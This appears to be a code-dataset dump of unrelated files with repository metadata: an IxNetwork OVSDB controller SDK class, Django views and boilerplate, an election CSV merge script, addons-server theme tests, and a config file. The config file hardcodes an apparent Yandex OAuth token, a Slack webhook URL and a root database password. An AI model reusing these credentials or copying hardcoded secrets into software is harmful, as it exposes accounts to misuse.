"""Deletes all the contained ovsdbcontroller resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, EnableLogging=None, Errors=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, PseudoMultiplier=None, PseudoMultiplierBfd=None, PseudoMultiplierVxlanReplicator=None, Role=None, ServerAddDeleteConnectionError=None, ServerAddDeleteStatus=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
"""Finds and retrieves ovsdbcontroller resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ovsdbcontroller resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all ovsdbcontroller resources from the server.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
- DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
- EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
- Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoMultiplier (number): Multiplier for GUI-only connection
- PseudoMultiplierBfd (number): Multiplier for GUI-only connection
- PseudoMultiplierVxlanReplicator (number): Multiplier for GUI-only connection
- Role (list(str[master | none | slave])): The role of the OVSDB Controller.
- ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
- ServerAddDeleteStatus (str): Status of all servers Added/Deleted to Controller. Use Get Server Add/Delete Status, right click action to get current status
- SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
- Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Returns
-------
- self: This instance with matching ovsdbcontroller resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of ovsdbcontroller data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ovsdbcontroller resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def Abort(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the abort operation on the server.
Abort CPF control plane (equals to demote to kUnconfigured state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
abort(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
abort(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('abort', payload=payload, response_object=None)
def AddServer(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the addServer operation on the server.
Add Server.
addServer(Arg2=list, async_operation=bool)list
----------------------------------------------
- Arg2 (list(number)): List of indices for which to Add Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('addServer', payload=payload, response_object=None)
def ClearLastErrors(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the clearLastErrors operation on the server.
Clear Error Messages reported due to Last Action.
clearLastErrors(Arg2=list, async_operation=bool)list
----------------------------------------------------
- Arg2 (list(number)): List of indices for which to clear last reported error messages.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearLastErrors', payload=payload, response_object=None)
def ClearPortLogs(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the clearPortLogs operation on the server.
Add Server.
clearPortLogs(Arg2=list, async_operation=bool)list
--------------------------------------------------
- Arg2 (list(number)): List of indices for which to Add Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('clearPortLogs', payload=payload, response_object=None)
def ControllerDumpDB(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the controllerDumpDB operation on the server.
Command to fetch Tor Information stored internally.
controllerDumpDB(Arg2=list, async_operation=bool)list
-----------------------------------------------------
- Arg2 (list(number)): List of indices into the device group.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('controllerDumpDB', payload=payload, response_object=None)
def DeleteServer(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the deleteServer operation on the server.
Delete Server.
deleteServer(Arg2=list, async_operation=bool)list
-------------------------------------------------
- Arg2 (list(number)): List of indices for which to Delete Server.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('deleteServer', payload=payload, response_object=None)
def DumpDB(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the dumpDB operation on the server.
Attach.
dumpDB(Arg2=list, async_operation=bool)list
-------------------------------------------
- Arg2 (list(number)): List of indices into the device group.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('dumpDB', payload=payload, response_object=None)
def GetServerAddDeleteStatus(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[List[str], None]
"""Executes the getServerAddDeleteStatus operation on the server.
Get Server Status.
getServerAddDeleteStatus(Arg2=list, async_operation=bool)list
-------------------------------------------------------------
- Arg2 (list(number)): List of indices for which to get Server Status.
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns list(str): ID to associate each async action invocation
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('getServerAddDeleteStatus', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the restartDown operation on the server.
Stop and start interfaces and sessions that are in Down state.
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
restartDown(async_operation=bool)
---------------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=list, async_operation=bool)
------------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
restartDown(SessionIndices=string, async_operation=bool)
--------------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('restartDown', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
Start CPF control plane (equals to promote to negotiated state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=list, async_operation=bool)
------------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(SessionIndices=string, async_operation=bool)
--------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Stop CPF control plane (equals to demote to PreValidated-DoDDone state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=list, async_operation=bool)
-----------------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(SessionIndices=string, async_operation=bool)
-------------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('stop', payload=payload, response_object=None)
def get_device_ids(self, PortNames=None, ClearDumpDbFiles=None, ConnectionType=None, ControllerTcpPort=None, DirectoryName=None, DumpdbDirectoryName=None, EnableOvsdbServerIp=None, ErrorCode=None, ErrorDesc=None, ErrorLogDirectoryName=None, ErrorLogicalSwitchName=None, ErrorPhysicalSwitchName=None, ErrorTimeStamp=None, FileCaCertificate=None, FileCertificate=None, FileHWGatewayCertificate=None, FilePrivKey=None, HSCConfiguration=None, OvsdbSchema=None, OvsdbServerIp=None, ServerConnectionIp=None, TableNames=None, VerifyHWGatewayCertificate=None, VerifyPeerCertificate=None):
"""Base class infrastructure that gets a list of ovsdbcontroller device ids encapsulated by this object.
Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
Args
----
- PortNames (str): optional regex of port names
- ClearDumpDbFiles (str): optional regex of clearDumpDbFiles
- ConnectionType (str): optional regex of connectionType
- ControllerTcpPort (str): optional regex of controllerTcpPort
- DirectoryName (str): optional regex of directoryName
- DumpdbDirectoryName (str): optional regex of dumpdbDirectoryName
- EnableOvsdbServerIp (str): optional regex of enableOvsdbServerIp
- ErrorCode (str): optional regex of errorCode
- ErrorDesc (str): optional regex of errorDesc
- ErrorLogDirectoryName (str): optional regex of errorLogDirectoryName
- ErrorLogicalSwitchName (str): optional regex of errorLogicalSwitchName
- ErrorPhysicalSwitchName (str): optional regex of errorPhysicalSwitchName
- ErrorTimeStamp (str): optional regex of errorTimeStamp
- FileCaCertificate (str): optional regex of fileCaCertificate
- FileCertificate (str): optional regex of fileCertificate
- FileHWGatewayCertificate (str): optional regex of fileHWGatewayCertificate
- FilePrivKey (str): optional regex of filePrivKey
- HSCConfiguration (str): optional regex of hSCConfiguration
- OvsdbSchema (str): optional regex of ovsdbSchema
- OvsdbServerIp (str): optional regex of ovsdbServerIp
- ServerConnectionIp (str): optional regex of serverConnectionIp
- TableNames (str): optional regex of tableNames
- VerifyHWGatewayCertificate (str): optional regex of verifyHWGatewayCertificate
- VerifyPeerCertificate (str): optional regex of verifyPeerCertificate
Returns
-------
- list(int): A list of device ids that meets the regex criteria provided in the method parameters
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._get_ngpf_device_ids(locals())
| [
"pdobrinskiy@yahoo.com"
] | pdobrinskiy@yahoo.com |
ee6e1bdad63bc6a6d29628edf3690192dd546726 | 1cbe5354da423041dc23621c67c206c9f1ae96b3 | /Source/os_sim/manage.py | 2f841b59d685b075582cb7afceabec6b4dee6ba6 | [] | no_license | ayush113/OS-Simulator | 4bf4b42f34f15976d926b43439695fc089426b76 | 3bba2891c8e5d84bb95ccaa72980da0326a77448 | refs/heads/master | 2021-03-19T15:31:38.355198 | 2018-04-11T12:09:54 | 2018-04-11T12:09:54 | 123,108,876 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 538 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "os_sim.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"ayush.kumar1999@gmail.com"
] | ayush.kumar1999@gmail.com |
6c2f8675a34b2202e7559088098d3f390f73c1c2 | d37f88df7d8f198b26ba32fe8c34ea8357db2c58 | /contacts/views.py | 4c9745ab38acdae623a4d274ff14c640e21eeb4d | [] | no_license | JakeTheReaper/BTRE_DjangoProject | abfe09176545d3eed72a521ac983fd95a8d1d62a | 30110ada9ef15953ea800df880abe268ec9fc5a6 | refs/heads/master | 2023-04-30T04:18:54.151467 | 2019-08-27T09:15:32 | 2019-08-27T09:15:32 | 203,151,290 | 0 | 0 | null | 2023-04-21T20:36:37 | 2019-08-19T10:30:56 | CSS | UTF-8 | Python | false | false | 1,619 | py | from django.shortcuts import render, redirect
from django.contrib import messages
from django.core.mail import send_mail
from .models import Contact
def contact(request):
if request.method == 'POST':
listing_id = request.POST['listing_id']
listing = request.POST['listing']
name = request.POST['name']
email = request.POST['email']
phone = request.POST['phone']
message = request.POST['message']
user_id = request.POST['user_id']
realtor_email = request.POST['realtor_email']
# Check if user has made inquiry already
if request.user.is_authenticated:
user_id = request.user.id
has_contacted = Contact.objects.all().filter(listing_id=listing_id, user_id=user_id)
if has_contacted:
messages.error(request, 'You have already made an inquiry for this listing')
return redirect('/listings/' + listing_id)
contact = Contact(listing=listing, listing_id=listing_id, name=name, email=email, phone=phone,
message=message, user_id=user_id)
contact.save()
# Send email
send_mail(
'Property Listing Inquiry',
'There has been an inquiry for ' + listing + '. Sign into the admin panel for more info',
'jake.zerafa86@gmail.com',
[realtor_email, 'jake.zerafa86@gmail.com'],
fail_silently=False
)
messages.success(request, 'Your request has been submitted, a realtor will get back to you soon')
return redirect('/listings/'+listing_id)
| [
"jake.zerafa86@gmail.com"
] | jake.zerafa86@gmail.com |
b7bad42217740964a6c56c458b83e77dcb6f7ac0 | 22102fe3aadaabb967b9a0e33af5ea624afdaa38 | /merge.py | 6c48c87b8644f6c9004bdadef6fdc3dcc8e4f93d | [
"MIT"
] | permissive | tecoholic/Election2021 | 1c840a0e7ba23c885ca07ab9e676087fb312189f | 0b3fb8930d09883f5b58584f6f14b02d30788cbf | refs/heads/main | 2023-04-30T22:20:37.406868 | 2021-05-14T11:17:16 | 2021-05-14T11:17:16 | 363,843,846 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,297 | py | import os
import pandas as pd
states = {
"AS": 126,
"KL": 140,
"PY": 30,
"TN": 234,
"WB": 294
}
def get_code(party):
if party.lower() == "none of the above":
return "NOTA"
party = party.replace("of ", "") # handle CPIM
parts = party.split(" ")
parts = [p.strip() for p in parts]
return "".join(p[0] if not p.startswith("(") else p[0:2]+p[-1] for p in parts).upper()
def main():
for state in states:
print("Merging files of ", state)
base_dir = os.path.join("may2021", state)
df = None
for i in range(1, states[state] + 1):
filename = os.path.join(base_dir, f"{i}.csv")
try:
data = pd.read_csv(filename)
except FileNotFoundError:
print("Cannot find file: ", filename)
continue
data["AC_NO"] = i
data["Position"] = data["Total Votes"].rank(
ascending=False).astype('int')
data["Party Code"] = data["Party"].apply(get_code)
if df is None:
df = data
else:
df = df.append(data)
fname = os.path.join(base_dir, "all_candidate.csv")
df.to_csv(fname, index=False)
if __name__ == "__main__":
main()
| [
"arun@arunmozhi.in"
] | arun@arunmozhi.in |
963b9d86d12b307ab607ada7da6ae7a4f04c14d5 | c7f44f6fd55fe65270012fabc6c0d70b505134b2 | /src/olympia/versions/tests/test_utils.py | 93bce22e3517d132a63f362c6417bcc53e12d78d | [] | permissive | sayantanu-dey/addons-server | 84b25bbd4497ad6323bb189354afd4b219ce659c | 1c051e755b037dfac3f2bf128b481e932be6832e | refs/heads/master | 2020-09-02T08:29:40.403706 | 2019-11-07T16:24:59 | 2019-11-07T16:24:59 | 219,175,878 | 1 | 0 | BSD-3-Clause | 2019-11-02T15:48:55 | 2019-11-02T15:48:54 | null | UTF-8 | Python | false | false | 9,271 | py | import json
import math
import os
import shutil
import tempfile
import zipfile
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.test.utils import override_settings
from unittest import mock
import pytest
from PIL import Image, ImageChops
from olympia import amo, core
from olympia.amo.tests import addon_factory, TestCase, user_factory
from olympia.files.tests.test_utils_ import AppVersionsMixin
from olympia.versions.utils import (
AdditionalBackground, new_69_theme_properties_from_old,
new_theme_version_with_69_properties, process_color_value, write_svg_to_png
)
@pytest.mark.parametrize(
'filename', (('weta_theme_full'), ('weta_theme_list'))
)
def test_write_svg_to_png(filename):
# If you want to regenerate these, e.g. the svg template has significantly
# changed, you can grab the svg file from shared_storage/tmp - when
# settings.DEBUG==True it's not deleted afterwards.
# Output png files are in shared_storage/uploads/version-previews/full
# and /thumbs.
svg_xml = os.path.join(
settings.ROOT,
'src/olympia/versions/tests/static_themes/%s.svg' % filename)
svg_png = os.path.join(
settings.ROOT,
'src/olympia/versions/tests/static_themes/%s.png' % filename)
with storage.open(svg_xml, 'rb') as svgfile:
svg = svgfile.read()
try:
out_dir = tempfile.mkdtemp()
out = os.path.join(out_dir, 'a', 'b.png')
write_svg_to_png(svg, out)
assert storage.exists(out)
# compare the image content. rms should be 0 but travis renders it
# different... 3 is the magic difference.
svg_png_img = Image.open(svg_png)
svg_out_img = Image.open(out)
image_diff = ImageChops.difference(svg_png_img, svg_out_img)
except Exception as e:
raise e
finally:
shutil.rmtree(out_dir)
sum_of_squares = sum(
value * ((idx % 256) ** 2)
for idx, value in enumerate(image_diff.histogram()))
rms = math.sqrt(
sum_of_squares / float(svg_png_img.size[0] * svg_png_img.size[1]))
assert rms < 3
@pytest.mark.parametrize(
'alignment, alignments_tuple', (
('center bottom', ('center', 'bottom')),
('top', ('center', 'top')),
('center', ('center', 'center')),
('left', ('left', 'center')),
('', ('', ''))
)
)
def test_additional_background_split_alignment(alignment, alignments_tuple):
assert AdditionalBackground.split_alignment(alignment) == alignments_tuple
@mock.patch('olympia.versions.utils.encode_header')
@pytest.mark.parametrize(
'alignment, tiling, image_width, image_height, ' # inputs
'pattern_width, pattern_height, pattern_x, pattern_y', # results
(
# these are all with a small image than the svg size
('center bottom', 'no-repeat', 120, 50,
680, 92, 280, 42),
('top', 'repeat-x', 120, 50,
120, 92, 280, 0),
('center', 'repeat-y', 120, 50,
680, 50, 280, 21),
('left top', 'repeat', 120, 50,
120, 50, 0, 0),
# alignment=None is 'right top'
(None, 'repeat', 120, 50,
120, 50, 560, 0),
# tiling=None is 'no-repeat'
('center', None, 120, 50,
680, 92, 280, 21),
# so this is alignment='right top'; tiling='no-repeat'
(None, None, 120, 50,
680, 92, 560, 0),
# repeat with a larger image than the svg size
('center bottom', 'no-repeat', 1120, 450,
1120, 450, -220, -358),
('top', 'repeat-x', 1120, 450,
1120, 450, -220, 0),
('center', 'repeat-y', 1120, 450,
1120, 450, -220, -179),
('left top', 'repeat', 1120, 450,
1120, 450, 0, 0),
# alignment=None is 'right top'
(None, 'repeat', 1120, 450,
1120, 450, -440, 0),
# tiling=None is 'no-repeat'
('center', None, 1120, 450,
1120, 450, -220, -179),
# so this is alignment='right top'; tiling='no-repeat'
(None, None, 1120, 450,
1120, 450, -440, 0),
)
)
def test_additional_background(
encode_header_mock, alignment, tiling, image_width, image_height,
pattern_width, pattern_height, pattern_x, pattern_y):
encode_header_mock.return_value = (
'foobaa', image_width, image_height)
path = 'empty.png'
background = AdditionalBackground(path, alignment, tiling, None)
assert background.src == 'foobaa'
assert background.width == image_width
assert background.height == image_height
background.calculate_pattern_offsets(
amo.THEME_PREVIEW_SIZES['header']['full'].width,
amo.THEME_PREVIEW_SIZES['header']['full'].height)
assert background.pattern_width == pattern_width
assert background.pattern_height == pattern_height
assert background.pattern_x == pattern_x
assert background.pattern_y == pattern_y
@pytest.mark.parametrize(
'manifest_property, manifest_color, firefox_prop, css_color', (
('bookmark_text', [2, 3, 4], 'bookmark_text', 'rgb(2,3,4)'),
('frame', [12, 13, 14], 'frame', 'rgb(12,13,14)'),
('textcolor', 'rgb(32,33,34)', 'tab_background_text', 'rgb(32,33,34)'),
('accentcolor', 'rgb(42, 43, 44)', 'frame', 'rgb(42,43,44)'),
('toolbar_text', 'rgb(42,43,44)', 'bookmark_text', 'rgb(42,43,44)'),
)
)
def test_process_color_value(manifest_property, manifest_color, firefox_prop,
css_color):
assert (firefox_prop, css_color) == (
process_color_value(manifest_property, manifest_color))
class TestNew69ThemeProperties(AppVersionsMixin, TestCase):
file_obj_dep = os.path.join(
settings.ROOT,
'src/olympia/devhub/tests/addons/static_theme_deprecated.zip')
def setUp(self):
self.call_signing_mock = self.patch(
'olympia.lib.crypto.signing.call_signing')
self.call_signing_mock.return_value = 'abcdefg1234'
def test_new_69_theme_properties_from_old(self):
old = {
'theme': {
'colors': {
'accentcolor': '#dfa672',
'textcolor': '#fff',
'toolbar_text': 'rgb(0,12,34)',
},
'images': {
'headerURL': 'path/to/image'
}
}
}
new_ = new_69_theme_properties_from_old(old)
assert new_ == {
'theme': {
'colors': {
'frame': '#dfa672',
'tab_background_text': '#fff',
'bookmark_text': 'rgb(0,12,34)',
},
'images': {
'theme_frame': 'path/to/image'
}
}
}
def test_new_69_theme_properties_from_old_no_overwrite(self):
old = {
'theme': {
'colors': {
'accentcolor': '#dfa672',
'textcolor': '#fff',
'toolbar_text': 'rgb(0,12,34)',
'frame': '#672',
'tab_background_text': '#eee',
'bookmark_text': 'rgb()',
},
'images': {
'headerURL': 'path/to/image',
'theme_frame': 'path/to/otherimage',
}
}
}
new_ = new_69_theme_properties_from_old(old)
assert new_ == old
@override_settings(ENABLE_ADDON_SIGNING=True)
def test_new_theme_version_with_69_properties(self):
core.set_user(user_factory())
addon = addon_factory(
type=amo.ADDON_STATICTHEME, version_kw={'version': '1.0'})
old_version = addon.current_version
old_file_path = old_version.all_files[0].current_file_path
amo.storage_utils.copy_stored_file(self.file_obj_dep, old_file_path)
assert os.path.isfile(old_file_path)
new_version = new_theme_version_with_69_properties(old_version)
assert addon.versions.all().count() == 2
assert addon.current_version == new_version
new_file_path = new_version.all_files[0].current_file_path
with zipfile.ZipFile(self.file_obj_dep, 'r') as old_xpi:
with zipfile.ZipFile(new_file_path, 'r') as new_xpi:
assert len(old_xpi.infolist()) == len(new_xpi.infolist())
for entry in old_xpi.infolist():
file_ = entry.filename
if file_ == 'manifest.json':
old_manifest = json.loads(old_xpi.read(file_))
new_manifest = json.loads(new_xpi.read(file_))
assert old_manifest != new_manifest
# need to pop the version as it's been bumped
old_ver_num = old_manifest.pop('version')
new_ver_num = new_manifest.pop('version')
assert old_ver_num != new_ver_num
assert new_manifest == (
new_69_theme_properties_from_old(old_manifest))
else:
assert old_xpi.read(file_) == new_xpi.read(file_)
| [
"noreply@github.com"
] | sayantanu-dey.noreply@github.com |
b492a44bd15acf4605998bd0e646112469d741ec | e0a4e4d0014182dd58f53f9252191f72ebd94084 | /update_db/new_update/const.py | e4df0569c582de4434f1855931ab9fde6597cfa5 | [] | no_license | pinchukovartur/YandexAnalyticsServer | 8360b7000393cfac3d02e71768f0d853e8a3506a | 78c4afe5f08ecbb5ea18ffad1f2cfa1574cccaaf | refs/heads/master | 2021-05-15T00:57:31.753597 | 2018-08-06T15:09:39 | 2018-08-06T15:09:39 | 100,603,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | # STATIC DATA
# download config
TOKEN = "AQAAAAATpP0XAAR70vxUpgjrAkq_h3IGIcgKL-0"
TIME_SLEEP = 10
COUNT_PACK = 1000
# database config
SERVER_HOST = "http://localhost:8080"
DB_USER = "root"
DB_PASSWORD = "root"
DB_NAME = "analytics"
DB_HOST = "localhost"
MAX_SIZE_QUERY = 35000 # максимальный размер запроса (в символах)
# slack config
SLACK_URL = "https://hooks.slack.com/services/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"
SLACK_CHANEL = "#yandexanalytics"
SLACK_USERNAME = "Update YandexAnalytics"
SLACK_ICON = ":smile:"
| [
"pinchukovartur@outlook.com"
] | pinchukovartur@outlook.com |
b3445673b598b5fd351054d4e8e1370058ddf81f | 32dd66da6d17ae012e9ce205bd45798fd0862f0f | /migrations/0003_userip_users.py | 349c188dcc917b7e9d093e36186b4f52faf8c29c | [] | no_license | Tsvetov/analys_users | 58f570cab7e8246bfcf32ad8d7f25aac164bdca0 | 29ac4cc04fc7fa2bd02cba5c61dbc3a024f17eed | refs/heads/master | 2016-09-06T05:38:03.450472 | 2015-08-19T13:03:55 | 2015-08-19T13:03:55 | 40,681,787 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('analys_users', '0002_auto_20150818_2011'),
]
operations = [
migrations.AddField(
model_name='userip',
name='users',
field=models.ManyToManyField(related_name='users_rel_+', to='analys_users.UserIP'),
),
]
| [
"cpn@cpn"
] | cpn@cpn |
